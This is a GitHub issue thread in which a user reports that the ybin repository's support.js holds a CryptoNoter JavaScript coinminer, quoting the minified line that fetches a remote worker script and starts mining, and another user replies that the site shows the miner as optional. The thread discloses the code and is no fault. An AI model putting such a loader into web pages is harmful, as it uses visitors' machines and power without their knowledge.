ybin icon indicating copy to clipboard operation
ybin copied to clipboard

JS:Miner-C [Trj]

Open djw4 opened this issue 7 years ago • 1 comments

Your repository includes a javascript coinminer in the code, located in support.js:

function(){CryptoNoter.CRYPTONIGHT_WORKER_BLOB=t.URL.createObjectURL(new Blob([s.responseText])),this._asmjsStatus="loaded",this._startNow()}.bind(this),s),s.open("get","https://ybin.me/worker.js",!0),s.send();

Why? If you were to disclose that in the documentation then sure, but leaving that out isn't a good look.

djw4 avatar Mar 09 '18 00:03 djw4

This is mostly a silly question because if you look at the site itself: image Then you can see in plain view it is an optional miner for supporting the site host.

BlackHoleFox avatar Mar 16 '18 04:03 BlackHoleFox